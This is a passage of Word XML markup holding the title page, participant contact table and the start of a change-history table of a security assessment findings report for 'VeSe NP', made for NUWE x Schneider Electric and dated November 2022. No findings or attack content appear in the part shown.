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BD24" w14:textId="1A4DE5BA" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790B7174" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4CF2A1" w14:textId="3972CB2A" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F60D79E" wp14:editId="5A5A4EF3">
            <wp:extent cx="4591050" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Imagen 2" descr="Nuw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we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4591050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08229768" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1BCCB7" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:t>VeSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:t xml:space="preserve"> NP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE1714" w14:textId="2666496E" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:t>Security Assessment Findings Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D1F49" w14:textId="2A8762B9" w:rsidR="00B15381" w:rsidRPr="002355AE" w:rsidRDefault="00B15381">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E325EE" w14:textId="7332E350" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02477BB0" w14:textId="0B60B9BA" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C1BD30" w14:textId="55939C23" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD9DF15" w14:textId="334FDF7A" w:rsidR="001131B3" w:rsidRPr="002355AE" w:rsidRDefault="001131B3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3D23AA" w14:textId="368DEA27" w:rsidR="001131B3" w:rsidRPr="002355AE" w:rsidRDefault="001131B3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334250CB" w14:textId="77777777" w:rsidR="001131B3" w:rsidRPr="002355AE" w:rsidRDefault="001131B3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2579ED63" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="TitlePage-Version"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BF8A86" w14:textId="6C575844" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="TitlePage-Version"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:t>Date: November 19</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:t>, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE2296D" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC947C" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc119432373"/>
      <w:bookmarkStart w:id="1" w:name="_Toc119794102"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="0E1A43F9" w14:textId="77777777" w:rsidTr="00F75CA0">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC94F95" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BFEEEC1" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20AE637A" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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970"/>
        <w:gridCol w:w="4950"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="26429CE3" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D2B05C0" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56888D10" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4F987162" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="0519F99E" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52EA6463" w14:textId="689BEC06" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00DB29D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NUWE x Schneider Electric</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="1EED3771" w14:textId="77777777" w:rsidTr="00BD0B0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5089D918" w14:textId="00653DCD" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00432DEC" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Meme aka. Josh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="535A5E7C" w14:textId="56630F49" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CE7A30C" w14:textId="75E79743" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="008F1064" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Email</w:t>
            </w:r>
            <w:r w:rsidR="00BD0B0F" w:rsidRPr="002355AE">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00DB29D8" w:rsidRPr="002355AE">
              <w:t>m3m3m3m0m3m4@protonmail.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D66E1B1" w14:textId="50A2E82A" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="008F1064" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:t>Github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BD0B0F" w:rsidRPr="002355AE">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00DB29D8" w:rsidRPr="002355AE">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="6435CA3B" w14:textId="77777777" w:rsidTr="00BD0B0F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D74B283" w14:textId="5B529342" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00432DEC" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:t>Dimu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:t xml:space="preserve"> aka Dima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50F0F181" w14:textId="38DFA50C" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="008F1064" w:rsidP="00F75CA0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E57A4A5" w14:textId="438C0931" w:rsidR="008F1064" w:rsidRPr="002355AE" w:rsidRDefault="008F1064" w:rsidP="008F1064">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t xml:space="preserve">Email: </w:t>
            </w:r>
            <w:r w:rsidR="00105C0C" w:rsidRPr="002355AE">
              <w:t>info@dimu.dev</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A428002" w14:textId="0476C6FA" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="008F1064" w:rsidP="008F1064">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:t>Github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00105C0C" w:rsidRPr="002355AE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00105C0C" w:rsidRPr="002355AE">
              <w:t>DimuHvH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="400ED36E" w14:textId="13D1FFBA" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473FC5F6" w14:textId="0CB54275" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00E50B77">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc119794103"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hange History</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="20C32DD1" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10144"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9"/>
        <w:gridCol w:w="2355"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="3544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E50B77" w:rsidRPr="002355AE" w14:paraId="08465F53" w14:textId="0666F65C" w:rsidTr="00DB29D8">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10BB25E2" w14:textId="6E29F877" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Toc119432374"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76A8FB9B" w14:textId="09D842B0" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BC96577" w14:textId="17B37030" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Editor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3705EC5B" w14:textId="24D4B48B" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Changes / Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E50B77" w:rsidRPr="002355AE" w14:paraId="7A2FD815" w14:textId="79493D17" w:rsidTr="00E50B77">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="607609EC" w14:textId="743226CC" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B6791B5" w14:textId="19D6B5DF" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>11/19/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EBE00C2" w14:textId="3CB29599" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Dima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09B999FD" w14:textId="36D2F4B5" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>File Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E50B77" w:rsidRPr="002355AE" w14:paraId="0178A742" w14:textId="3055317D" w:rsidTr="00E50B77">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2119" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18819405" w14:textId="7DFBAA61" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E1836FE" w14:textId="5DB3C19F" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>11/19/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7685AE32" w14:textId="14955D00" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:t>Dima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
